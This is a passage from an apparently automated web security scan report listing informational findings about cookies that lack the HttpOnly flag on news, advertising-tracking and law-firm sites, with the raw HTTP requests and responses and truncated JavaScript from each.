Set-Cookie: LOOPFUSE=6839ce2a-0bad-40a6-a65f-c621a7d51f1a; Expires=Fri, 11-May-2012 12:10:11 GMT
Content-Length: 51
Date: Thu, 12 May 2011 12:10:11 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/

_lf_vid='6839ce2a-0bad-40a6-a65f-c621a7d51f1a';

14.90. http://lfov.net/webrecorder/js/listen.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lfov.net
Path:	/webrecorder/js/listen.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-405e0b67=405e0b12:0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webrecorder/js/listen.js HTTP/1.1
Host: lfov.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Last-Modified: Thu, 21 Apr 2011 03:32:43 GMT
Cache-Control: max-age=604800, public
Pragma: public
Expires: Thu, 19 May 2011 08:10:09 GMT
Date: Thu, 12 May 2011 12:10:09 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/
Content-Length: 5132

var _lf_cid="";var i="";var _lf_mydomain="";var _lf_doc=document;var _lf_doc_title=_lf_doc.title;var _lf_currpage=window.location.href;var _lf_loopfusePageProtocol=window.location.protocol+"//";var _l
...[SNIP]...

14.91. http://lfov.net/webrecorder/w previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lfov.net
Path:	/webrecorder/w

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-405e0b67=405e0b12:0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webrecorder/w?cid=LF_9a6c9f10&vid=9508c8ea-cfac-4a9a-8137-aeaa3d55f0e1&from=&t=Global%20Information%20%26%20Communication%20Technology%20Services%20-%20CSS%20Corp&res=1920x1200&cp=http%3A//www.csscorp.com/&0.8998631196799449 HTTP/1.1
Host: lfov.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Length: 0
Date: Thu, 12 May 2011 12:10:13 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/

14.92. http://marketing.csscorp.com/acton/bn/1090/visitor.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://marketing.csscorp.com
Path:	/acton/bn/1090/visitor.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wp1090=UTCTDDDDDDTVYCAV; Domain=.csscorp.com; Expires=Fri, 11-May-2012 12:10:14 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.93. http://markets.on.nytimes.com/research/modules/dealbook_2010/dealbook.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://markets.on.nytimes.com
Path:	/research/modules/dealbook_2010/dealbook.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

1977%5F0=A65E7F62E7765BC47864BFFE807574BD; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /research/modules/dealbook_2010/dealbook.asp?18 HTTP/1.1
Host: markets.on.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 11:03:51 GMT
Content-Length: 12169
Content-Type: text/html
Expires: Thu, 12 May 2011 11:02:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Set-Cookie: 1977%5F0=A65E7F62E7765BC47864BFFE807574BD; path=/

try { // cache bg imgs in IE
document.execCommand("BackgroundImageCache", false, true);
} catch(err) {}
var currentRegion = 'TopMovers';
function changeRegion(region){
document.getElementById
...[SNIP]...

14.94. http://meter-svc.nytimes.com/meter.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://meter-svc.nytimes.com
Path:	/meter.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; expires=Tue, 10-May-2016 11:03:07 GMT; path=/; domain=.nytimes.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.95. http://metrics.foxnews.com/b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.foxnews.com
Path:	/b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26E5E362850118AA-4000010460000E60[CE]; Expires=Tue, 10 May 2016 11:38:45 GMT; Domain=.foxnews.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.96. http://odb.outbrain.com/utils/get previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/get

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Sun, 06-May-2012 11:38:58 GMT; Path=/
tick=1305200338968; Domain=.outbrain.com; Path=/
_lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJupcdCqR9LRjXrHG0R5k0w1Cmy75SN8RJIzfjUZTvndAnxUfc7q0DyhK"; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Thu, 07-Jun-2012 11:38:58 GMT; Path=/
_lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFbCCininxsHoqtNnPoy33i"; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Thu, 19-May-2011 00:26:58 GMT; Path=/
_rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Thu, 07-Jun-2012 11:38:58 GMT; Path=/
recs-e80144bf1a192df3448809d952ee1141="eC1Ki6F3rC8/svSOgW/oVTpcaosScNndNmo3MfZ/qv3YEjyvRDq1LX6X1QyPUzCq6iss2g1lePRnvUVzvXh96eFC8InIUHABF8oRDv48Y9bI07wQyS0dxtSyPDvDcjnrDOayEsL6HLp5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Thu, 12-May-2011 11:43:58 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.97. http://odb.outbrain.com/utils/ping.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/ping.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Sun, 06-May-2012 11:38:43 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.98. http://overseebroad.d.chango.com/c/t.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://overseebroad.d.chango.com
Path:	/c/t.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; Domain=chango.com; expires=Sun, 09 May 2021 12:01:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.99. http://pepperhamilton.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pepperhamilton.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1305201705%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Ayzustqxtwswvrsr; path=/; expires=Fri, 13-May-2011 12:01:45 GMT
pepperhamilton.com=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1305201705%7Cclick%3A0%7Cblocked%3A0; path=/; expires=Fri, 13-May-2011 12:01:45 GMT
Spusr=3c0015ac4dd84dcbcc2919f5; path=/; expires=Sat, 11-May-2013 12:01:45 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA HTTP/1.1
Host: pepperhamilton.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: parkinglot=1

Response

14.100. http://pillsburylaw.app4.hubspot.com/salog.js.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pillsburylaw.app4.hubspot.com
Path:	/salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT95=521213100.0.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: pillsburylaw.app4.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Thu, 12 May 2011 12:21:46 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=StsAonAvzQEkAAAAYjYwNjBlNjMtYTcyMi00NzE0LWI1NjQtNDMyYWNlNmQ3NDBj0; expires=Fri, 11-May-2012 12:21:46 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=148ff71c-54bf-42a7-b313-024966931ee5; domain=pillsburylaw.app4.hubspot.com; expires=Wed, 12-May-2021 05:00:00 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Set-Cookie: HUBSPOT95=521213100.0.0000; path=/
Content-Length: 498

var hsUse20Servers = true;
var hsDayEndsIn = 56293;
var hsWeekEndsIn = 315493;
var hsMonthEndsIn = 1697893;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-05-12 08:21
...[SNIP]...

14.101. http://pix04.revsci.net/D08734/a1/0/0/0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4jOhOHMMH/CFfyFZ5hBdG2vMqqLhSnJolGYsbyViGzm2jLwzYcdvSuDCX0BRE1faH6+pFVa+GWQXtDZTUlxD+4jxjaUOSiFWtaoRoWoEPzPFS/qMKOOgZxQVZZx2KCmQqCYRlyRJf87ly0DSxTUuHjFQ0X4Hi6hsBM3tptwhcQ6pKtiVzlPmT7J8YSmFCk8nGaEi8uw/pmdbUTDTCxPk3RxS+r7mTK51H+dbGZLb/kqnwYVwKVrKOpzc2O7wkmux+3qQQWO2J/PszzKC3ljESTz9399xzwtiFsZVYcKXVwxqFxDvGNQKXo0ptbR/IoxdSLmJBEm/k8mMZ4WHkJPjZT6fMEbI5g2M23AmaEQVktEetBJDbNPFWQ27V53NSmx+pbUr0pyI2ZBpEkHXsJYi7feTziLd3p9rHEXUDElkF/JDK4BDzYWVkKPFz6yF0rj48gBSTjhqU76TX+wY6WQDAsO771VDP2ZWQ68peAWlQwYgNRKVrDobMsl6Di7agpiSJECqh49MPhXgfUNp5lUgedG8SrI1FwY+H+428kgnXdAmQmN7meRbdFHLSVjzHBTtsWXT5/q0gECh/yWYSya2Cs2TIFbkGCETZtyyfEwg+tWpzb+0IRvhjWHw7U+DaYa4diIYnFw06AxKeXqq5os2iI7jC3Nwf1OV6egaBTwbrJMZV+YVqL6TCiQG/Ma7cvYoHyjMK/GORsYUSnGWb/7Qya7gaNIaWZhJB3LxWvWTaSypA8xdHhg+e92kAdckvfreKjwNhZ3lgBC+XuGOtuJj6dxjPWryrjN2phQuTcOO/r6vGfLN8Z67irPcUn4=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:29 GMT; Path=/
udm_0=MLv39DMJZjprpr6vNwncqcAhdFtCsylMowYZxUW6MEqE8x+80+EqavgLMisVIcRzxwED7xvBKcptbVAK4xFQ4O9EOqJvQebjGkd2HvREU0eLo2l7yxWL/0MG7WVevK0RZx2HhKkOoO/XXE0cn0xNxLLlkMLrRCuXSNgvzgl00hTJygH5vsQF9AIe7nxcFEHzq7J/ryTDvo60kEZzCwnaQ0K70d/Z6I1egvMVrmMOud14+0L4jK9oliS4SVIfi71WWS8QsvOLa3LHEp84tDqtc0KZ44av7FUHoA3KYXKF4bQvZX91+OzSuIx7Q+J/QUhIRsYvfps2p/P6fS9etpeWLdX3rRKbUPuBZaZdj7skNQ15/D05elgQRnXEUzcQesr4WlTSulpp1g1S9A/ay9O64ZCeHlgo/svVsg3sSflpCjO0+VFkIgHH36fXHR/aZUE4HpuZ7n74F47alyR3ggNzAA0dPLqubl8Pn8TZMeLhYqQqbqmNUM4TohYzNF1DylgdgKvJuKxZjRR3qW4Gs/idOi7ARur7BPiVmF0JgNykm5IeTF+JRxN5G8nb6JAcLm/3MT6DMb2aLTWGlEHB9OkKhN07Vg2CZMZyV3yj8AorBW6bIfFUAQaz86cBNVGw/brB482dcIcOSlDYj3R32G+Ri28jIeWo/aR8B4xOXjdvf43/jW5cG5IH+hCJU5BQRHMzeeDdribF2+cARePUDtezFyfvdsc1iatfVpH/+cq/6Iul6LmWpPrzCvxlo9THyXVf5SG33hrt8XqL7ZnRMKBonqXmubW8M0ERWmtvGAQJNvz3lbipQCdUr6h2evlj27/0o48V+FAPidP+kH6h08/TkrLE/ur2N5yWnT1jtElH3zKztgH1EmbiGo24I/283980L9f8diGrjPBHRBgP9SI3NCxPMjl/GwfwC22/uVYjbYHKIWKTKFIYlMo+1SeLUK2bmWApwgMuJwRJ/m7douMd0hlDBrnCXNfB9cjD1t/uY+0qm6tIBRial6QVcIh8V2ciyzaolzSBlGDfS067/wO3x3dEOpUry6h5s6RphjURwfJ2bFA449MZKAomjZzrv3AsLF62qnG4qcCi0AFUP7eQzbEADdigA+t4OGhMSbnIyWoTEIvYXedCYhW8HTFUnonIR2Jv4s/RTiVTeQhADvv955scv/Jor+u4QOFIEt0gA+vRV1qqwJfXlFkY2do4ur8K07HLd2hjiWcu08/Tulsiemrs+lzG6UQZFwQfv7yQNALTotsmh8f7IqfQfMRJV6KZBLwB/MoqWhMGup467JVSqX3GjsA1VpYWFz+El0zXZiEyN+2ywpq3YGOP1cfNxWlj2M/wq/9ZSsTIyY76aftTwaM8IGrmlEgJQMTZtE2QMA7QrJ+JpqcGPH4kRyM1nDxUiq0iL2I3AO6O2dJ7PlPozN7AtzHIQE2+8Ekgy2718eMT9PcTfTb+40qzKGhfUGl0FMWGIUeXKwEF0RgFA7YyDrwe0I8muicTwKm2mlOa5Pnv2iWMkF9zjk//hL6AiqD1RYSlrusb2Imme66VfjuOoD8=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:29 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.102. http://pix04.revsci.net/E05510/b3/0/3/1003161/38529734.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/E05510/b3/0/3/1003161/38529734.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4kmheQIMDjaxY4NY56qG7poa4ScLEaatLDiorNn5vw/ZUtic7CM+ql6+GQ3/2mfzBOt0uz4ioZbxdZ4yKQR6q2VPvFKPznRql5h8iOvwP/r7Uf9IwSmkFH0NoNDiWsOdoP7A+KE3858M0WhU+zdS/59inCiCUTWQLaizzQIR1Jh2FmjnSE2fdifYxO0hFnS9FxZXoM+ewAQ+WVQFcEZFaUeEkXZNT/PBQgjdRcK4WGBrlOv1DqmZz7xuATb8CytltZbgXJJY58xcZwnCXCHFuTkIHFW1FoL2aE3zRAgMg51YquKmovdXv+QV0fhRfnE6xPSyEMpC58Mxj+nWjf7oD6WG0lAcTegTtCOgCgI2k1pcgBbUwiV80ods8sxbygUz1dWn6ZUvSekSbxlwCdRn098aaj47CC7oVk9kO1pb0VM9cA3b665SB+OhF1zFHEkp/+QDgoNrBn8VKykiY+qLw/Bu+8Nctq5EdHrD86cthCAfjJ+JvhBtr+hvqcWrBDZZ+BOW2Zj+sZGvsnMIE70w1kK6+FcYdWh7pzpV71WufhmJZAsP9t0SA6EQrS3/mb6hBtyus6WizP/iq6oNZERiMkyG4bHD5g0lcaW8LBUqxKHj8/Tqt+nPtAzGxPA1sGQ5x1/GDy6rIH0dmflRdEw4eI+C4e8g5L+zpQkeNco1i6W1TmWS8ddUxVEYkFvTgqscQGR2CT4TqyQ5P7VYSokaeW2RJdMkFPRFl0wJFkVyVYTst5kLNlTOSewhb3OmW4N3Mne/l1d+HJACtoFxAji0GHuoTyUdi5TqQ6rYK5yqaf9YyGEF3AbHBA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:26 GMT; Path=/
NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b0b2&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:38:26 GMT; Path=/
rtc_Pt3a=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:26 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.103. http://pix04.revsci.net/H07707/b3/0/3/0806180/203086575.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/203086575.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4kOheAIMDjaxq2F29zEFqICTC+braGYRkX2ILzU0ubO+NO1EpsZ5SuHqPlIcMQ/0lXam/+piUhfp6MYDi5Ltmb3W/u0nGlRZLTdLeKuvFLJgwTUBQGmkGThl5pam9X0SDfBM1hv0IyFY0OJlD25LZxlv9giU9jzd4cBIDZmhH54Gojd6/jUtx5FZUgM0a+E9ZSdZZI5yoFedrb8//hiG6CEgOEMFcjoIeueUCxtkaeQDfr1Ybo11k8JXewFWXjFkF7Clb5Fbawer1yrgahjjsBaE5ImfVwFDpu70tLiWFMA3kByEjqxkCdipzMTXYEaeZJ6BgxzRBIFTNqAqAzi/oX38PIZd66GdRlw8ucpDQxfmw6gdlHEU9znYrpDT4IHGwFrIVJvCqMoVFODAapUufdY9wfxryj4I4tUp6M1QwerLGSqWdi/5zP8Tczymm7yXUan3PBm+/v+pJydx2y4M/bpTik+dJkknw763IQz49m9/lp1xnGhB4rBJAilJb7rRfb1QpgqVkYr0LKAmIEnp+MOPBdEoEOQtUtl9mNyfeZ0o0vJ3TMg+0ybtwr5WKuG4CyJaerSWqG6+zaw3jmwxR63lfJqcBVOtpwnNvfz/fCFZe8ylIa/BMzgeHRC6dvYmU4reagzBAkh4i5kSxtwbOhcV3Cy1XGJAht5G1Q2bdyaxqHaj4Oa2P8csqTtEL8sW1qo1xQfNlI5qOPJGGlpX0zHyHPmhpn/MmF2MU2O1Wl3oRKRA1mGN/u2wrZ8lnqzpMHmMYzTXfJOZcCFpZWp5amWwhA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/
